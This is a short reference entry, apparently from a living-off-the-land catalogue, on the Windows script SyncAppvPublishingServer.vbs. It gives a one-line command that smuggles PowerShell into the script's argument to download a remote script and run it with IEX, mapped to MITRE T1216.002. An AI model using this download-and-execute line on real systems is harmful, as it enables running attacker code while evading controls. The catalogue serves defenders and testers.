Syncappvpublishingserver.vbs

type: OSScripts
Script used related to app-v and publishing server

Full path

C:\Windows\System32\SyncAppvPublishingServer.vbs

Commands

  1. ExecuteUser T1216.002

    Use Powershell host invoked from vbs script

    SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('{REMOTEURL:.ps1}') | IEX"

    Inject PowerShell script code with the provided arguments

    os: Windows 10, Windows 11

    Execute: PowerShell

Detection

Resources

acknowledgement: Nick Landers @monoxgas, Casey Smith @subtee